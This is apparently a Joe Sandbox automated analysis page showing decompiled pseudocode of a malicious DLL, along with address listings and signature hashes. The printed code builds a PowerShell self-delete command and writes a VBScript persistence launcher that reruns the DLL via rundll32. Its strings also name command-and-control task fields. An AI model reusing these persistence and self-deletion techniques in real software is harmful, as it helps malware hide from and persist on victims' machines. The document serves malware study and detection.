				E0000021E21EF2FE6530(_t648, _t818 - 0x18, _t818 + 0x138, _t810, _t817, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)) + 0x20, _t818 + 0x00000440 | 0xffffffff);
				 *((long long*)(_t819 + 0x60)) = 0xf31b0230;
				 *((long long*)(_t819 + 0x68)) = 0xf31b0230;
				 *((long long*)(_t819 + 0x68)) = 0xf;
				 *((long long*)(_t819 + 0x60)) = 0xf31b0230;
				 *((char*)(_t819 + 0x50)) = 0;
				r8d = 0xa;
				E0000021E21EF2FE6400(_t648, _t819 + 0x50, "powershell", _t817, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)) + 0x20);
				GetCurrentProcessId();
				E0000021E21EF2FE9020(_t818 + 0x2d0);
				E0000021E21EF2FEB660(_t818 + 0x50, _t818 - 0x70, _t818 + 0x50);
				r8d = r8d ^ r8d;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE82C0(_t648, _t819 + 0x50, _t818 + 0x50, _t810, _t817, _t818, _t818 + 0x50, _t818 + 0x00000440 | 0xffffffffffffffff), r8d * 0x3e8, _t818 - 0x70), r8d * 0x3e8, _t818 + 0x2d0);
				r8d = 0x15;
				E0000021E21EF2FE8170(_t648, _t819 + 0x50, "; Remove-Item -Path \"", _t810, _t818, _t630);
				r8d = 0;
				E0000021E21EF2FE82C0(_t648, _t819 + 0x50, _t818 - 0x18, _t810, _t817, _t818, _t630, _t818 + 0x00000440 | 0xffffffffffffffff);
				r8d = 8;
				E0000021E21EF2FE8170(_t648, _t819 + 0x50, "\" -Force", _t810, _t818, _t630);
				E0000021E21EF2FE8170(_t648, _t819 + 0x50, "\"", _t810, _t818, _t857);
				_t753 =  >=  ?  *((void*)(_t819 + 0x50)) : _t819 + 0x50;
				0xf301c460();
				__imp__CoUninitialize();
				ExitProcess(??);
			}


















































































                                        0x21ef2fe9b47
                                        0x21ef2fe9b4c
                                        0x21ef2fe9b50
                                        0x21ef2fe9b57
                                        0x21ef2fe9b59
                                        0x21ef2fe9b5c
                                        0x21ef2fe9b68
                                        0x21ef2fe9b89
                                        0x21ef2fe9b8c
                                        0x21ef2fe9b96
                                        0x21ef2fe9b9d
                                        0x21ef2fe9ba4
                                        0x21ef2fe9bac
                                        0x21ef2fe9bb0
                                        0x21ef2fe9bb4
                                        0x21ef2fe9bbd
                                        0x21ef2fe9bd9
                                        0x21ef2fe9bdc
                                        0x21ef2fe9be0
                                        0x21ef2fe9bf2
                                        0x21ef2fe9bf8
                                        0x21ef2fe9bfb
                                        0x21ef2fe9c13
                                        0x21ef2fe9c16
                                        0x21ef2fe9c20
                                        0x21ef2fe9c27
                                        0x21ef2fe9c2e
                                        0x21ef2fe9c36
                                        0x21ef2fe9c3e
                                        0x21ef2fe9c42
                                        0x21ef2fe9c4b
                                        0x21ef2fe9c67
                                        0x21ef2fe9c6a
                                        0x21ef2fe9c6e
                                        0x21ef2fe9c80
                                        0x21ef2fe9c8b
                                        0x21ef2fe9c93
                                        0x21ef2fe9c97
                                        0x21ef2fe9c9b
                                        0x21ef2fe9cb0
                                        0x21ef2fe9cb4
                                        0x21ef2fe9cd6
                                        0x21ef2fe9cdb
                                        0x21ef2fe9cf0
                                        0x21ef2fe9cf3
                                        0x21ef2fe9cfa
                                        0x21ef2fe9d00
                                        0x21ef2fe9d09
                                        0x21ef2fe9d12
                                        0x21ef2fe9d19
                                        0x21ef2fe9d20
                                        0x21ef2fe9d2b
                                        0x21ef2fe9d32
                                        0x21ef2fe9d38
                                        0x21ef2fe9d3f
                                        0x21ef2fe9d46
                                        0x21ef2fe9d51
                                        0x21ef2fe9d58
                                        0x21ef2fe9d5e
                                        0x21ef2fe9d65
                                        0x21ef2fe9d6c
                                        0x21ef2fe9d77
                                        0x21ef2fe9d7e
                                        0x21ef2fe9d89
                                        0x21ef2fe9d99
                                        0x21ef2fe9d9c
                                        0x21ef2fe9d9f
                                        0x21ef2fe9db0
                                        0x21ef2fe9db8
                                        0x21ef2fe9dc0
                                        0x21ef2fe9dc7
                                        0x21ef2fe9dd3
                                        0x21ef2fe9df5
                                        0x21ef2fe9df8
                                        0x21ef2fe9dff
                                        0x21ef2fe9e13
                                        0x21ef2fe9e1e
                                        0x21ef2fe9e24
                                        0x21ef2fe9e2a
                                        0x21ef2fe9e2c
                                        0x21ef2fe9e2f
                                        0x21ef2fe9e3d
                                        0x21ef2fe9e49
                                        0x21ef2fe9e58
                                        0x21ef2fe9e5b
                                        0x21ef2fe9e5e
                                        0x21ef2fe9e6f
                                        0x21ef2fe9e77
                                        0x21ef2fe9e7f
                                        0x21ef2fe9e86
                                        0x21ef2fe9e92
                                        0x21ef2fe9eb4
                                        0x21ef2fe9eb7
                                        0x21ef2fe9ebe
                                        0x21ef2fe9ed2
                                        0x21ef2fe9edd
                                        0x21ef2fe9ee3
                                        0x21ef2fe9ee9
                                        0x21ef2fe9eeb
                                        0x21ef2fe9eee
                                        0x21ef2fe9efc
                                        0x21ef2fe9f08
                                        0x21ef2fe9f17
                                        0x21ef2fe9f1a
                                        0x21ef2fe9f2e
                                        0x21ef2fe9f36
                                        0x21ef2fe9f3a
                                        0x21ef2fe9f41
                                        0x21ef2fe9f4d
                                        0x21ef2fe9f6f
                                        0x21ef2fe9f72
                                        0x21ef2fe9f79
                                        0x21ef2fe9f8d
                                        0x21ef2fe9f95
                                        0x21ef2fe9fa5
                                        0x21ef2fe9fa8
                                        0x21ef2fe9fab
                                        0x21ef2fe9fbc
                                        0x21ef2fe9fc4
                                        0x21ef2fe9fcc
                                        0x21ef2fe9fd3
                                        0x21ef2fe9fdf
                                        0x21ef2fea001
                                        0x21ef2fea004
                                        0x21ef2fea00b
                                        0x21ef2fea01f
                                        0x21ef2fea02a
                                        0x21ef2fea030
                                        0x21ef2fea036
                                        0x21ef2fea038
                                        0x21ef2fea03b
                                        0x21ef2fea049
                                        0x21ef2fea055
                                        0x21ef2fea064
                                        0x21ef2fea070
                                        0x21ef2fea09e
                                        0x21ef2fea0a4
                                        0x21ef2fea0a9
                                        0x21ef2fea0b1
                                        0x21ef2fea0bc
                                        0x21ef2fea0c6
                                        0x21ef2fea0cb
                                        0x21ef2fea0d1
                                        0x21ef2fea0d7
                                        0x21ef2fea0dd
                                        0x21ef2fea0e2
                                        0x21ef2fea0e6
                                        0x21ef2fea0ea
                                        0x21ef2fea0f1
                                        0x21ef2fea0f8
                                        0x21ef2fea104
                                        0x21ef2fea10a
                                        0x21ef2fea10e
                                        0x21ef2fea133
                                        0x21ef2fea13f
                                        0x21ef2fea145
                                        0x21ef2fea14c
                                        0x21ef2fea152
                                        0x21ef2fea159
                                        0x21ef2fea162
                                        0x21ef2fea16d
                                        0x21ef2fea180
                                        0x21ef2fea183
                                        0x21ef2fea187
                                        0x21ef2fea18e
                                        0x21ef2fea19f
                                        0x21ef2fea1a1
                                        0x21ef2fea1ae
                                        0x21ef2fea1c1
                                        0x21ef2fea1c7
                                        0x21ef2fea1d4
                                        0x21ef2fea1d9
                                        0x21ef2fea1e1
                                        0x21ef2fea1e6
                                        0x21ef2fea1ec
                                        0x21ef2fea1f3
                                        0x21ef2fea1f9
                                        0x21ef2fea200
                                        0x21ef2fea20a
                                        0x21ef2fea213
                                        0x21ef2fea218
                                        0x21ef2fea220
                                        0x21ef2fea224
                                        0x21ef2fea229
                                        0x21ef2fea231
                                        0x21ef2fea237
                                        0x21ef2fea241
                                        0x21ef2fea24a
                                        0x21ef2fea250
                                        0x21ef2fea257
                                        0x21ef2fea25d
                                        0x21ef2fea264
                                        0x21ef2fea26e
                                        0x21ef2fea274
                                        0x21ef2fea279
                                        0x21ef2fea284
                                        0x21ef2fea288
                                        0x21ef2fea28e
                                        0x21ef2fea296
                                        0x21ef2fea29b
                                        0x21ef2fea2a0
                                        0x21ef2fea2ab
                                        0x21ef2fea2af
                                        0x21ef2fea2b2
                                        0x21ef2fea2c2
                                        0x21ef2fea2cc
                                        0x21ef2fea2e2
                                        0x21ef2fea2ef
                                        0x21ef2fea2f4
                                        0x21ef2fea309
                                        0x21ef2fea30c
                                        0x21ef2fea30c
                                        0x21ef2fea319
                                        0x21ef2fea32e
                                        0x21ef2fea336
                                        0x21ef2fea33d
                                        0x21ef2fea344
                                        0x21ef2fea352
                                        0x21ef2fea35e
                                        0x21ef2fea360
                                        0x21ef2fea366
                                        0x21ef2fea378
                                        0x21ef2fea37d
                                        0x21ef2fea386
                                        0x21ef2fea38b
                                        0x21ef2fea397
                                        0x21ef2fea39b
                                        0x21ef2fea39e
                                        0x21ef2fea3ae
                                        0x21ef2fea3b8
                                        0x21ef2fea3c5
                                        0x21ef2fea3d2
                                        0x21ef2fea3df
                                        0x21ef2fea3e4
                                        0x21ef2fea3f9
                                        0x21ef2fea3fc
                                        0x21ef2fea3fc
                                        0x21ef2fea409
                                        0x21ef2fea41d
                                        0x21ef2fea425
                                        0x21ef2fea42c
                                        0x21ef2fea433
                                        0x21ef2fea441
                                        0x21ef2fea44d
                                        0x21ef2fea465
                                        0x21ef2fea46a
                                        0x21ef2fea473
                                        0x21ef2fea478
                                        0x21ef2fea484
                                        0x21ef2fea488
                                        0x21ef2fea48b
                                        0x21ef2fea49b
                                        0x21ef2fea4a1
                                        0x21ef2fea4a3
                                        0x21ef2fea4a6
                                        0x21ef2fea4b3
                                        0x21ef2fea4c7
                                        0x21ef2fea4d6
                                        0x21ef2fea4db
                                        0x21ef2fea4ed
                                        0x21ef2fea4fa
                                        0x21ef2fea4ff
                                        0x21ef2fea508
                                        0x21ef2fea50d
                                        0x21ef2fea519
                                        0x21ef2fea51d
                                        0x21ef2fea520
                                        0x21ef2fea530
                                        0x21ef2fea532
                                        0x21ef2fea535
                                        0x21ef2fea53b
                                        0x21ef2fea540
                                        0x21ef2fea543
                                        0x21ef2fea545
                                        0x21ef2fea554
                                        0x21ef2fea55e
                                        0x21ef2fea563
                                        0x21ef2fea56f
                                        0x21ef2fea573
                                        0x21ef2fea576
                                        0x21ef2fea586
                                        0x21ef2fea590
                                        0x21ef2fea595
                                        0x21ef2fea59e
                                        0x21ef2fea5a3
                                        0x21ef2fea5ab
                                        0x21ef2fea5b2
                                        0x21ef2fea5c5
                                        0x21ef2fea5c8
                                        0x21ef2fea5cc
                                        0x21ef2fea5d3
                                        0x21ef2fea5de
                                        0x21ef2fea5e3
                                        0x21ef2fea5e8
                                        0x21ef2fea609
                                        0x21ef2fea610
                                        0x21ef2fea616
                                        0x21ef2fea61a
                                        0x21ef2fea61c
                                        0x21ef2fea620
                                        0x21ef2fea628
                                        0x21ef2fea62d
                                        0x21ef2fea637
                                        0x21ef2fea63c
                                        0x21ef2fea642
                                        0x21ef2fea649
                                        0x21ef2fea64f
                                        0x21ef2fea656
                                        0x21ef2fea660
                                        0x21ef2fea669
                                        0x21ef2fea66e
                                        0x21ef2fea676
                                        0x21ef2fea679
                                        0x21ef2fea67d
                                        0x21ef2fea681
                                        0x21ef2fea688
                                        0x21ef2fea693
                                        0x21ef2fea6a6
                                        0x21ef2fea6a9
                                        0x21ef2fea6b4
                                        0x21ef2fea6c5
                                        0x21ef2fea6c7
                                        0x21ef2fea6d4
                                        0x21ef2fea6e7
                                        0x21ef2fea6fc
                                        0x21ef2fea706
                                        0x21ef2fea710
                                        0x21ef2fea723
                                        0x21ef2fea726
                                        0x21ef2fea72a
                                        0x21ef2fea731
                                        0x21ef2fea742
                                        0x21ef2fea744
                                        0x21ef2fea751
                                        0x21ef2fea764
                                        0x21ef2fea76a
                                        0x21ef2fea777
                                        0x21ef2fea77c
                                        0x21ef2fea784
                                        0x21ef2fea789
                                        0x21ef2fea78f
                                        0x21ef2fea796
                                        0x21ef2fea79c
                                        0x21ef2fea7a3
                                        0x21ef2fea7ad
                                        0x21ef2fea7b6
                                        0x21ef2fea7bb
                                        0x21ef2fea7c3
                                        0x21ef2fea7c7
                                        0x21ef2fea7cc
                                        0x21ef2fea7d4
                                        0x21ef2fea7da
                                        0x21ef2fea7e4
                                        0x21ef2fea7ed
                                        0x21ef2fea7f3
                                        0x21ef2fea7fa
                                        0x21ef2fea800
                                        0x21ef2fea807
                                        0x21ef2fea811
                                        0x21ef2fea817
                                        0x21ef2fea821
                                        0x21ef2fea834
                                        0x21ef2fea837
                                        0x21ef2fea842
                                        0x21ef2fea848
                                        0x21ef2fea84d
                                        0x21ef2fea852
                                        0x21ef2fea853
                                        0x21ef2fea858
                                        0x21ef2fea859
                                        0x21ef2fea85e
                                        0x21ef2fea85f
                                        0x21ef2fea865
                                        0x21ef2fea86a
                                        0x21ef2fea86b
                                        0x21ef2fea870
                                        0x21ef2fea871
                                        0x21ef2fea876
                                        0x21ef2fea877
                                        0x21ef2fea87d
                                        0x21ef2fea882
                                        0x21ef2fea883
                                        0x21ef2fea888
                                        0x21ef2fea889
                                        0x21ef2fea88e
                                        0x21ef2fea88f
                                        0x21ef2fea895
                                        0x21ef2fea89a
                                        0x21ef2fea89b
                                        0x21ef2fea8a0
                                        0x21ef2fea8a1
                                        0x21ef2fea8a6
                                        0x21ef2fea8a7
                                        0x21ef2fea8ad
                                        0x21ef2fea8b2
                                        0x21ef2fea8b3
                                        0x21ef2fea8b8
                                        0x21ef2fea8b9
                                        0x21ef2fea8be
                                        0x21ef2fea8bf
                                        0x21ef2fea8c5
                                        0x21ef2fea8ca
                                        0x21ef2fea8cb
                                        0x21ef2fea8d0
                                        0x21ef2fea8d1
                                        0x21ef2fea8d6
                                        0x21ef2fea8d7
                                        0x21ef2fea8dd
                                        0x21ef2fea8e0
                                        0x21ef2fea8e8
                                        0x21ef2fea8f2
                                        0x21ef2fea8f6
                                        0x21ef2fea904
                                        0x21ef2fea910
                                        0x21ef2fea931
                                        0x21ef2fea94d
                                        0x21ef2fea951
                                        0x21ef2fea96a
                                        0x21ef2fea96f
                                        0x21ef2fea973
                                        0x21ef2fea977
                                        0x21ef2fea97f
                                        0x21ef2fea983
                                        0x21ef2fea98b
                                        0x21ef2fea999
                                        0x21ef2fea99f
                                        0x21ef2fea9a4
                                        0x21ef2fea9a9
                                        0x21ef2fea9b2
                                        0x21ef2fea9b7
                                        0x21ef2fea9bc
                                        0x21ef2fea9ce
                                        0x21ef2fea9d4
                                        0x21ef2fea9e3
                                        0x21ef2fea9f0
                                        0x21ef2fea9fa
                                        0x21ef2feaa1c
                                        0x21ef2feaa21
                                        0x21ef2feaa33
                                        0x21ef2feaa3c
                                        0x21ef2feaa48
                                        0x21ef2feaa4d
                                        0x21ef2feaa5f
                                        0x21ef2feaa73
                                        0x21ef2feaa83
                                        0x21ef2feaa89
                                        0x21ef2feaa8e
                                        0x21ef2feaa96

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$file_entry_point$powershell$response_status$task$task_data$task_id$tasks
                                        • API String ID: 3472027048-1893740589
                                        • Opcode ID: f4837e265cbb1a9a4bfda2367f8435db46ec640a00ba540cf5765c1bd5d03857
                                        • Instruction ID: 24e7a276f63b0ac655658a9f76501b577b5eeb70b6a4cebee40e2e3853fea275
                                        • Opcode Fuzzy Hash: f4837e265cbb1a9a4bfda2367f8435db46ec640a00ba540cf5765c1bd5d03857
                                        • Instruction Fuzzy Hash: 1D729C33221A8689EF61EF64DC583DA23A0F764758F420615DE5D5BF9ADF38C686C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE76A0 Relevance: 30.2, APIs: 12, Strings: 5, Instructions: 412COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E0000021E21EF2FE76A0(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, signed long long __r9, signed int __r12) {
				void* __rbp;
				void* __r14;
				void* _t157;
				signed char _t162;
				void* _t164;
				long _t172;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t188;
				int _t194;
				void* _t196;
				signed int _t208;
				void* _t220;
				void* _t221;
				void* _t222;
				void* _t268;
				intOrPtr _t269;
				intOrPtr _t271;
				intOrPtr _t273;
				long long _t274;
				intOrPtr _t276;
				intOrPtr _t278;
				char* _t280;
				intOrPtr _t290;
				void* _t291;
				void* _t295;
				void* _t297;
				void* _t334;
				intOrPtr _t338;
				void* _t339;
				intOrPtr* _t374;
				void* _t380;
				void* _t383;
				void* _t384;
				void* _t385;
				signed long long _t403;
				signed long long _t404;
				signed long long _t405;
				void* _t412;
				void* _t416;
				void* _t417;

				_t414 = __r12;
				_t403 = __r9;
				_t268 = _t384;
				_t383 = _t268 - 0x698;
				_t385 = _t384 - 0x780;
				 *((long long*)(_t383 + 0x30)) = 0xfffffffe;
				 *((long long*)(_t268 + 8)) = __rbx;
				 *((long long*)(_t268 + 0x10)) = __rsi;
				 *((long long*)(_t268 + 0x18)) = __rdi;
				 *((long long*)(_t268 + 0x20)) = __r12;
				_t374 = __r9;
				_t380 = __r8;
				_t417 = __rdx;
				_t416 = __rcx;
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x18], xmm0");
				r12d = 0;
				 *((long long*)(_t383 + 0x28)) = __r12;
				 *((intOrPtr*)(_t385 + 0x40)) = r12b;
				_t157 = E0000021E21EF2FE7D30(__rbx, _t383 + 0x18, _t385 + 0x40);
				r9d = 0;
				_t11 = _t414 + 0x23; // 0x23
				r8d = _t11;
				_t280 =  *((intOrPtr*)(_t383 + 0x18));
				__imp__SHGetSpecialFolderPathA();
				if (_t157 != 0) goto 0xf2fe771f;
				goto 0xf2fe7cf8;
				 *((long long*)(_t385 + 0x58)) = __r12;
				 *((long long*)(_t385 + 0x60)) = __r12;
				 *((long long*)(_t385 + 0x60)) = 0xf;
				 *((long long*)(_t385 + 0x58)) = __r12;
				 *((char*)(_t385 + 0x48)) = 0;
				if ( *_t280 != 0) goto 0xf2fe7746;
				goto 0xf2fe775a;
				asm("o16 nop [eax+eax]");
				if ( *((char*)(_t280 + (__r12 | 0xffffffff) + 1)) != 0) goto 0xf2fe7750;
				E0000021E21EF2FE6400(_t280, _t385 + 0x48, _t280, __r8, (__r12 | 0xffffffff) + 1);
				if ( *((long long*)(_t385 + 0x58)) != 0) goto 0xf2fe777a;
				goto 0xf2fe7c8d;
				E0000021E21EF2FE8950(_t280, _t385 + 0x68, "\\", _t380, _t383, _t416, _t403);
				_t404 = _t403 | 0xffffffff;
				r8d = r8d ^ r8d;
				E0000021E21EF2FE82C0(_t280, _t385 + 0x48, _t268, _t374, _t380, _t383, _t416, _t404);
				_t269 =  *((intOrPtr*)(_t383 - 0x80));
				if (_t269 - 0x10 < 0) goto 0xf2fe77fb;
				_t290 =  *((intOrPtr*)(_t385 + 0x68));
				if (_t269 + 1 - 0x1000 < 0) goto 0xf2fe77f6;
				if (0 == 0) goto 0xf2fe77c9;
				0xf3111be8();
				asm("int3");
				_t271 =  *((intOrPtr*)(_t290 - 8));
				if (_t271 - _t290 < 0) goto 0xf2fe77d8;
				0xf3111be8();
				asm("int3");
				_t291 = _t290 - _t271;
				if (_t291 - 8 >= 0) goto 0xf2fe77e7;
				0xf3111be8();
				asm("int3");
				if (_t291 - 0x27 <= 0) goto 0xf2fe77f3;
				0xf3111be8();
				asm("int3");
				0xf310ba8c();
				 *((long long*)(_t383 - 0x80)) = 0xf;
				 *((long long*)(_t385 + 0x78)) = __r12;
				 *((char*)(_t385 + 0x68)) = 0;
				if (_t380 == _t385 + 0x48) goto 0xf2fe782b;
				_t405 = _t404 | 0xffffffff;
				r8d = 0;
				E0000021E21EF2FE6530(_t280, _t380, _t385 + 0x48, _t374, _t380, _t416, _t405);
				if ( *((char*)(_t383 + 0x6c0)) == 0) goto 0xf2fe783e;
				goto 0xf2fe7c8d;
				_t295 =  >=  ?  *((void*)(_t385 + 0x48)) : _t385 + 0x48;
				_t162 = GetFileAttributesA(??);
				if (_t162 == 0xffffffff) goto 0xf2fe7866;
				if ((_t162 & 0x00000010) == 0) goto 0xf2fe7866;
				goto 0xf2fe7c8d;
				_t297 =  >=  ?  *((void*)(_t385 + 0x48)) : _t385 + 0x48;
				if (CreateDirectoryA(??, ??) != 0) goto 0xf2fe788b;
				goto 0xf2fe7c8d;
				_t164 = E0000021E21EF2FE8A10(_t385 + 0x48, _t280, _t385 + 0x68, _t385 + 0x48, _t380, _t405);
				0xf2fe8b00();
				E0000021E21EF2FE6100(_t164, 0, _t385 + 0x68);
				r8d = 4;
				E0000021E21EF2FE8170(_t280, _t383 - 8, ".dll", _t374, _t383, _t417);
				r8d = 0x208;
				E0000021E21EF310E410(0, 0, _t220, _t222, _t383 + 0x260, ".dll", _t374, _t417);
				_t273 =  *((intOrPtr*)(_t374 + 0x10));
				if (_t273 != 0) goto 0xf2fe790f;
				r8d = 0x208;
				E0000021E21EF310E410(0, 0, _t220, _t222, _t383 + 0x470, ".dll", _t374, _t417);
				r8d = 0x208;
				GetModuleFileNameA(??, ??, ??);
				goto 0xf2fe7937;
				_t281 =  <  ? _t273 : _t280;
				if ( *((long long*)(_t374 + 0x18)) - 0x10 < 0) goto 0xf2fe7920;
				if (( <  ? _t273 : _t280) == 0) goto 0xf2fe7937;
				E0000021E21EF310DC90(0, _t220, _t221, _t222, _t383 + 0x260,  *_t374,  *_t374, _t380,  <  ? _t273 : _t280);
				 *((long long*)(_t385 + 0x30)) = __r12;
				 *((intOrPtr*)(_t385 + 0x28)) = 0x80;
				 *((intOrPtr*)(_t385 + 0x20)) = 3;
				r9d = 0;
				_t58 = _t405 + 1; // 0x1
				r8d = _t58;
				CreateFileA(??, ??, ??, ??, ??, ??, ??);
				_t381 = _t273;
				if (_t273 == 0xffffffff) goto 0xf2fe7c7e;
				_t172 = GetFileSize(??, ??);
				r14d = _t172;
				if (_t172 == 0) goto 0xf2fe79ed;
				_t274 =  *0xf320b518;
				if (_t274 != 0) goto 0xf2fe79b0;
				GetProcessHeap();
				 *0xf320b518 = _t274;
				if (_t274 != 0) goto 0xf2fe79b0;
				 *(_t385 + 0x44) = r12d;
				goto 0xf2fe79ed;
				HeapAlloc(??, ??, ??);
				_t377 = _t274;
				 *(_t385 + 0x44) = r12d;
				if (_t274 == 0) goto 0xf2fe79ed;
				 *((long long*)(_t385 + 0x20)) = __r12;
				r8d = r14d;
				ReadFile(??, ??, ??, ??, ??);
				_t208 =  *(_t385 + 0x44);
				CloseHandle(??);
				if (_t274 == 0) goto 0xf2fe7c7e;
				if (_t208 == 0) goto 0xf2fe7c7e;
				_t311 =  >=  ?  *((void*)(_t383 - 8)) : _t383 - 8;
				r8d = _t208;
				E0000021E21EF301B91C(_t274,  <  ? _t273 : _t280,  >=  ?  *((void*)(_t383 - 8)) : _t383 - 8, _t274, _t273, _t385 + 0x44);
				r8d = 0x200;
				E0000021E21EF310E410(0, 0, _t220, _t222, _t383 + 0x60, _t274, _t274, _t416);
				 *((intOrPtr*)(_t383 - 0x78)) = 0x100;
				GetUserNameW(??, ??);
				_t180 = E0000021E21EF2FE8A10(_t274,  <  ? _t273 : _t280, _t383 + 0x38, _t385 + 0x48, _t273, _t385 + 0x44);
				0xf2fe8b00();
				0xf2fe8a90();
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t180, 0, _t385 + 0x68), 0, _t383 + 0x38);
				 *(_t383 - 0x40) = __r12;
				 *((long long*)(_t383 - 0x38)) = __r12;
				 *((long long*)(_t383 - 0x38)) = 0xf;
				 *(_t383 - 0x40) = __r12;
				 *((char*)(_t383 - 0x50)) = 0;
				r8d = 0x6b;
				E0000021E21EF2FE6400( <  ? _t273 : _t280, _t383 - 0x50, "Set objShell = CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"rundll32.exe my_application_path, shjKeAQfgT\"\r\n", _t273, _t417);
				 *((long long*)(_t383 - 0x60)) = __r12;
				 *((long long*)(_t383 - 0x58)) = __r12;
				 *((long long*)(_t383 - 0x58)) = 0xf;
				 *((long long*)(_t383 - 0x60)) = __r12;
				 *((char*)(_t383 - 0x70)) = 0;
				r8d = 0x13;
				_t184 = E0000021E21EF2FE6400( <  ? _t273 : _t280, _t383 - 0x70, "my_application_path", _t273, _t417);
				_t363 =  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70;
				r8d = 0;
				_t185 = E0000021E21EF2FE6310(_t184, _t383 - 0x50,  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70, _t417,  *((intOrPtr*)(_t383 - 0x60)));
				if (_t274 == 0xffffffff) goto 0xf2fe7b5a;
				 *((long long*)(_t385 + 0x28)) = 0xffffffff;
				 *((long long*)(_t385 + 0x20)) = __r12;
				0xf2fe8c20();
				_t366 =  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70;
				_t186 = E0000021E21EF2FE6310(_t185, _t383 - 0x50,  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70,  *((intOrPtr*)(_t383 - 0x60)) + _t274,  *((intOrPtr*)(_t383 - 0x60)));
				if (_t274 != 0xffffffff) goto 0xf2fe7b10;
				E0000021E21EF2FE6100(_t186, 0, _t383 - 0x70);
				_t368 =  >=  ?  *((void*)(_t383 - 0x50)) : _t383 - 0x50;
				_t326 =  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30;
				r8d =  *(_t383 - 0x40);
				_t188 = E0000021E21EF301B91C(_t274, _t274,  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30,  >=  ?  *((void*)(_t383 - 0x50)) : _t383 - 0x50, _t273,  *((intOrPtr*)(_t383 - 0x60)));
				 *((long long*)(_t385 + 0x78)) = __r12;
				 *((long long*)(_t383 - 0x80)) = __r12;
				 *((long long*)(_t383 - 0x80)) = 7;
				 *((long long*)(_t385 + 0x78)) = __r12;
				 *((intOrPtr*)(_t385 + 0x68)) = r12w;
				r8d = 0xb;
				E0000021E21EF2FE8020(_t188, 0, _t274, _t274, _t385 + 0x68, L"wscript.exe", _t274, _t273,  *((intOrPtr*)(_t383 - 0x60)) + _t274);
				_t411 =  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30;
				 *((long long*)(_t385 + 0x30)) = _t385 + 0x68;
				E0000021E21EF30175E0(_t208, 0, _t221, _t274, L"wscript.exe", _t377, _t381, _t383 + 0x60,  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30, _t412, _t416);
				if ( *((intOrPtr*)(_t383 - 0x80)) - 8 < 0) goto 0xf2fe7bfa;
				0xf2fe8550();
				 *((long long*)(_t383 - 0x80)) = 7;
				 *((long long*)(_t385 + 0x78)) = __r12;
				 *((intOrPtr*)(_t385 + 0x68)) = r12w;
				E0000021E21EF2FE6100(E0000021E21EF2FE7EF0(E0000021E21EF2FE8950(_t274, _t383 + 0x38, "wscript.exe ", _t381, _t383, _t383 - 0x30,  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30), 0, _t274, _t383 - 0x30, _t385 + 0x68), 0, _t383 + 0x38);
				if ( *0xf320b4b0 == 0) goto 0xf2fe7c51;
				_t194 = CloseHandle(??);
				 *0xf320b4b0 = __r12;
				_t334 =  >=  ?  *((void*)(_t383 - 0x30)) : _t383 - 0x30;
				0xf301c460();
				_t196 = E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t194, 0, _t383 - 0x50), 0, _t383 - 0x30);
				goto 0xf2fe7c83;
				E0000021E21EF2FE6100(_t196, 0, _t383 - 8);
				_t276 =  *((intOrPtr*)(_t385 + 0x60));
				if (_t276 - 0x10 < 0) goto 0xf2fe7ce5;
				_t338 =  *((intOrPtr*)(_t385 + 0x48));
				if (_t276 + 1 - 0x1000 < 0) goto 0xf2fe7ce0;
				if (0 == 0) goto 0xf2fe7cb3;
				0xf3111be8();
				asm("int3");
				_t278 =  *((intOrPtr*)(_t338 - 8));
				if (_t278 - _t338 < 0) goto 0xf2fe7cc2;
				0xf3111be8();
				asm("int3");
				_t339 = _t338 - _t278;
				if (_t339 - 8 >= 0) goto 0xf2fe7cd1;
				0xf3111be8();
				asm("int3");
				if (_t339 - 0x27 <= 0) goto 0xf2fe7cdd;
				0xf3111be8();
				asm("int3");
				0xf310ba8c();
				 *((long long*)(_t385 + 0x60)) = 0xf;
				 *((long long*)(_t385 + 0x58)) = __r12;
				 *((char*)(_t385 + 0x48)) = 0;
				E0000021E21EF2FE7FB0(0, _t383 + 0x18);
				return 2;
			}














































                                        0x21ef2fe76a0
                                        0x21ef2fe76a0
                                        0x21ef2fe76a0
                                        0x21ef2fe76a8
                                        0x21ef2fe76af
                                        0x21ef2fe76b6
                                        0x21ef2fe76be
                                        0x21ef2fe76c2
                                        0x21ef2fe76c6
                                        0x21ef2fe76ca
                                        0x21ef2fe76ce
                                        0x21ef2fe76d1
                                        0x21ef2fe76d4
                                        0x21ef2fe76d7
                                        0x21ef2fe76da
                                        0x21ef2fe76dd
                                        0x21ef2fe76e2
                                        0x21ef2fe76e5
                                        0x21ef2fe76e9
                                        0x21ef2fe76f7
                                        0x21ef2fe76fc
                                        0x21ef2fe76ff
                                        0x21ef2fe76ff
                                        0x21ef2fe7704
                                        0x21ef2fe770d
                                        0x21ef2fe7715
                                        0x21ef2fe771a
                                        0x21ef2fe771f
                                        0x21ef2fe7724
                                        0x21ef2fe7729
                                        0x21ef2fe7732
                                        0x21ef2fe7737
                                        0x21ef2fe773f
                                        0x21ef2fe7744
                                        0x21ef2fe774a
                                        0x21ef2fe7758
